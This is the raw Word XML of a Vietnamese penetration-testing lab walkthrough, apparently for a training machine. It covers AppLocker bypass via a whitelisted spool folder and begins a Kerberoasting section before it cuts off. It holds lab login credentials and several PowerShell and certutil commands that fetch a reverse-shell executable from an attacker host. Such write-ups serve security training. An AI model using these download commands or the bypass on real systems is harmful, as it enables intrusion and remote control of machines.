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D9A5C6" w14:textId="73CB5575" w:rsidR="007E7FA5" w:rsidRDefault="007E7FA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Thông tin đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7B3FA" w14:textId="31A11DF3" w:rsidR="007E7FA5" w:rsidRPr="00833052" w:rsidRDefault="007E7FA5" w:rsidP="0083305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833052">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Username: corp\dark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8F302" w14:textId="3FB971E6" w:rsidR="007E7FA5" w:rsidRPr="00833052" w:rsidRDefault="007E7FA5" w:rsidP="00833052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833052">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Password: _QuejVudId6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48535DA5" w14:textId="413C5BA8" w:rsidR="007E7FA5" w:rsidRDefault="007E7FA5" w:rsidP="007E7FA5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618874AA" w14:textId="4F870DDB" w:rsidR="007E7FA5" w:rsidRPr="00833052" w:rsidRDefault="00833052">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833052">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bypassing Applocker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B6394" w14:textId="1A97D027" w:rsidR="00833052" w:rsidRDefault="00833052">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D192229" w14:textId="0110D404" w:rsidR="00833052" w:rsidRDefault="0083305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AppLocker là 1 ứng dụng whitelist được giới thiệu ở Windows 7. Nó  hạn chế các chương trình mà người dùng có thể thực thi dựa vào đường dẫn, nhà sản xuất và hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA2592B" w14:textId="5843BDE8" w:rsidR="00C01F5C" w:rsidRDefault="00C01F5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D95941" w14:textId="430E78AF" w:rsidR="00C01F5C" w:rsidRDefault="00C01F5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Kiểm tra các file bị blacklist/whitelist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D38BA8D" w14:textId="2459790F" w:rsidR="00C01F5C" w:rsidRDefault="00C01F5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1785F304" w14:textId="1F0B728E" w:rsidR="00C01F5C" w:rsidRDefault="00C01F5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571493E" wp14:editId="6B0E4F77">
            <wp:extent cx="5943600" cy="13023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81D6" w14:textId="6FA94E74" w:rsidR="00C01F5C" w:rsidRDefault="00C01F5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D33A0E4" w14:textId="4D88762D" w:rsidR="00C01F5C" w:rsidRDefault="00C01F5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DA81F7E" wp14:editId="2A4416A3">
            <wp:extent cx="5943600" cy="39674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8447" w14:textId="289A279E" w:rsidR="00501B81" w:rsidRDefault="00501B8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Hãy viết 1 chương trình C in ra Hello World!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE90BF" w14:textId="2733B9A4" w:rsidR="00501B81" w:rsidRDefault="00501B81">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F496EB" w14:textId="77777777" w:rsidR="00501B81" w:rsidRPr="00501B81" w:rsidRDefault="00501B81" w:rsidP="00501B81">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501B81">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074E7B6F" w14:textId="77777777" w:rsidR="00501B81" w:rsidRPr="00501B81" w:rsidRDefault="00501B81" w:rsidP="00501B81">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E1FE6E" w14:textId="77777777" w:rsidR="00501B81" w:rsidRPr="00501B81" w:rsidRDefault="00501B81" w:rsidP="00501B81">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501B81">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EAA923" w14:textId="77777777" w:rsidR="00501B81" w:rsidRPr="00501B81" w:rsidRDefault="00501B81" w:rsidP="00501B81">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501B81">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  printf("Hello World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05678221" w14:textId="77777777" w:rsidR="00501B81" w:rsidRPr="00501B81" w:rsidRDefault="00501B81" w:rsidP="00501B81">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501B81">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F02E2" w14:textId="77777777" w:rsidR="00501B81" w:rsidRPr="00501B81" w:rsidRDefault="00501B81">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501B81">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064214F2" w14:textId="302A2F1A" w:rsidR="00501B81" w:rsidRDefault="00501B81">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5DD235" w14:textId="1C96DF25" w:rsidR="00501B81" w:rsidRDefault="00501B8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Biên dịch chương trình: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB3DCB" w14:textId="5B7E8D28" w:rsidR="00501B81" w:rsidRDefault="00501B81">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FA0D67" w14:textId="2D2B6589" w:rsidR="00501B81" w:rsidRPr="00D23C1D" w:rsidRDefault="00501B81">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D23C1D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x86_64-w64-mingw32-gcc hello.c -o hello.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E3106F" w14:textId="66FD7B57" w:rsidR="00501B81" w:rsidRDefault="00501B81">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2571AC5F" w14:textId="5ADA517F" w:rsidR="001759C0" w:rsidRDefault="001759C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Chuyển tệp thực thi đến máy nạn nhân. Chúng ta sẽ vận chuyển nó qua máy chủ web: </w:t>
      </w:r>
      <w:r w:rsidRPr="001759C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -m http.server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047552A7" w14:textId="23F07828" w:rsidR="001759C0" w:rsidRDefault="001759C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B3E65CE" w14:textId="02F5B587" w:rsidR="001759C0" w:rsidRDefault="001759C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Tải nó về bằng lệnh Powershell: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC59138" w14:textId="77777777" w:rsidR="001759C0" w:rsidRDefault="001759C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D352E86" w14:textId="2741B3B7" w:rsidR="001759C0" w:rsidRPr="00D23C1D" w:rsidRDefault="001759C0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D23C1D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell Invoke-WebRequest -uri http://10.8.55.148:9000/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D23C1D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hello</w:t>
      </w:r>
      <w:r w:rsidRPr="00D23C1D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe -outfile </w:t>
      </w:r>
      <w:r w:rsidRPr="00D23C1D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hello</w:t>
      </w:r>
      <w:r w:rsidRPr="00D23C1D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E984BC0" w14:textId="539ECE2E" w:rsidR="001759C0" w:rsidRDefault="001759C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E5894DA" w14:textId="5E33E57F" w:rsidR="001759C0" w:rsidRDefault="001759C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Thực thi chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27A67D" w14:textId="3568D938" w:rsidR="000E4F5D" w:rsidRDefault="000E4F5D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1936694E" w14:textId="0CDEFB90" w:rsidR="001759C0" w:rsidRDefault="008C6A7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1657E34" wp14:editId="28F7619F">
            <wp:extent cx="5943600" cy="5245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7467" w14:textId="45A07B33" w:rsidR="00833052" w:rsidRDefault="00833052">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F6B731" w14:textId="2F5A4DBC" w:rsidR="001759C0" w:rsidRDefault="008C6A7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E469FCE" wp14:editId="162BF4C8">
            <wp:extent cx="5943600" cy="6927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FE2A" w14:textId="77777777" w:rsidR="008C6A71" w:rsidRDefault="008C6A71">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EFF793" w14:textId="35097B1A" w:rsidR="00833052" w:rsidRDefault="0083305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Bạn để ý thấy bạn không thể thực thi tệp nhị phân của bạn và một số chức năng nhất định trên hệ thống sẽ bị hạn chế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4607F" w14:textId="53B6CFFD" w:rsidR="00DB7A6B" w:rsidRDefault="00DB7A6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2755ED4F" w14:textId="265A3DD1" w:rsidR="00DB7A6B" w:rsidRDefault="00DB7A6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Có nhiều cách để bypass AppLocker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F025177" w14:textId="46FC3A91" w:rsidR="00DB7A6B" w:rsidRDefault="00DB7A6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555F9BB9" w14:textId="51FD1128" w:rsidR="00DB7A6B" w:rsidRDefault="00DB7A6B" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="-1272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Nếu Applocker được cấu hình theo các quy tắc mặc định, chúng ta có thể bypass nó bằng cách đặt tệp thực thi trong thư mục sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7A6B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Windows\System32\spool\drivers\color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74880AD6" w14:textId="2214B5BF" w:rsidR="00DB7A6B" w:rsidRDefault="00DB7A6B" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="-1272"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8D198F" w14:textId="3D49E66F" w:rsidR="00DB7A6B" w:rsidRDefault="00412F5F" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="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Đường dẫn này nằm trong whitelist của AppLocker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A0285" w14:textId="6FD8A9A9" w:rsidR="002D697E" w:rsidRDefault="002D697E" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0F5900" w14:textId="2C3983F1" w:rsidR="002D697E" w:rsidRDefault="002D697E" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="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thử reverse shell bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763FD53C" w14:textId="09E45929" w:rsidR="002D697E" w:rsidRDefault="002D697E" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183D1ED6" w14:textId="1FC1D745" w:rsidR="002D697E" w:rsidRDefault="002D697E" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4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4498F31" wp14:editId="429D1881">
            <wp:extent cx="5943600" cy="22764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33B4" w14:textId="6958E2EB" w:rsidR="002D697E" w:rsidRDefault="002D697E" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12063002" w14:textId="0C069848" w:rsidR="002D697E" w:rsidRDefault="002D697E" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D697E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Bị chặn bởi phần mềm chống virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740CC73D" w14:textId="29445B22" w:rsidR="002D697E" w:rsidRDefault="002D697E" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101E6E03" w14:textId="77777777" w:rsidR="00087429" w:rsidRDefault="00087429" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13687B32" w14:textId="77777777" w:rsidR="00087429" w:rsidRDefault="00087429" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF91E2A" w14:textId="7A6F1AEA" w:rsidR="00CA4C7B" w:rsidRDefault="00CA4C7B" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="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Tải file trên Windows cmd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B6A87A" w14:textId="2A4AEE21" w:rsidR="003D5B7F" w:rsidRPr="00087429" w:rsidRDefault="00087429" w:rsidP="00087429">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087429">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell Invoke-WebRequest -uri http://10.8.55.148:9000/reverse-shell.exe -outfile reverse-shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560AA654" w14:textId="77777777" w:rsidR="00D47771" w:rsidRDefault="00D47771" w:rsidP="00087429">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47771">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.8.55.148:9000/reverse-shell.exe','reverse-shell.exe')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2350F769" w14:textId="537F7F28" w:rsidR="003E3D10" w:rsidRDefault="00087429" w:rsidP="00087429">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087429">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>certutil -urlcache -split -f http://10.8.55.148:9000/reverse-shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8BE4F" w14:textId="4A53E84C" w:rsidR="00F72905" w:rsidRDefault="00F72905" w:rsidP="00F72905">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10037917" w14:textId="621F15E0" w:rsidR="00F72905" w:rsidRDefault="00F72905" w:rsidP="00F72905">
      <w:pPr>
        <w:ind w:right="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không mở được file reverse-shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D971A60" w14:textId="08DBB337" w:rsidR="00F72905" w:rsidRDefault="00F72905" w:rsidP="00F72905">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F76EC64" w14:textId="6ABF2588" w:rsidR="00F72905" w:rsidRDefault="00AB7C77" w:rsidP="00F72905">
      <w:pPr>
        <w:ind w:right="4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069434B" wp14:editId="12F20BE6">
            <wp:extent cx="4803022" cy="33566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956" b="27269"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4811238" cy="33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FCE56" w14:textId="736BA3B6" w:rsidR="00AB7C77" w:rsidRDefault="00AB7C77" w:rsidP="00F72905">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03748198" w14:textId="5272651E" w:rsidR="00AB7C77" w:rsidRPr="00F72905" w:rsidRDefault="00AB7C77" w:rsidP="00F72905">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520CA256" w14:textId="4E613466" w:rsidR="00087429" w:rsidRDefault="00087429" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022411EA" w14:textId="2C26BB49" w:rsidR="00087429" w:rsidRDefault="00BC033E" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4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65ED3D1" wp14:editId="348794F8">
            <wp:extent cx="5943600" cy="20161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B5AF" w14:textId="77777777" w:rsidR="00820E6A" w:rsidRDefault="00820E6A" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9D78EB" w14:textId="649E2CB1" w:rsidR="00A10763" w:rsidRPr="00281579" w:rsidRDefault="00281579" w:rsidP="00281579">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00281579">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23255C5E" w14:textId="6B55425C" w:rsidR="00281579" w:rsidRDefault="00281579" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DFB6D0" w14:textId="01EECCAF" w:rsidR="00281579" w:rsidRDefault="00467547" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="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Kerberos là 1 hệ thống xác thực cho mạng Windows và Active Directory.</w:t>
      </w:r>
      <w:r w:rsidR="004810A5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Có nhiều cách để tấn công Kerberos, hôm nay chúng ta sẽ dùng Powershell script để yêu cầu 1 service ticket cho 1 tài khoản và ticket hash. Sau đó ta có thể phá vỡ hash đó để </w:t>
      </w:r>
      <w:r w:rsidR="005D4F68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidR="004810A5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> quyền truy cập vào tài khoản </w:t>
      </w:r>
      <w:r w:rsidR="005D4F68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">người dùng </w:t>
      </w:r>
      <w:r w:rsidR="004810A5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7835A1" w14:textId="07AE4A18" w:rsidR="005D4F68" w:rsidRDefault="005D4F68" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445D1DB6" w14:textId="3D920B89" w:rsidR="005D4F68" w:rsidRDefault="005D4F68" w:rsidP="00DB7A6B">
      <w:pPr>
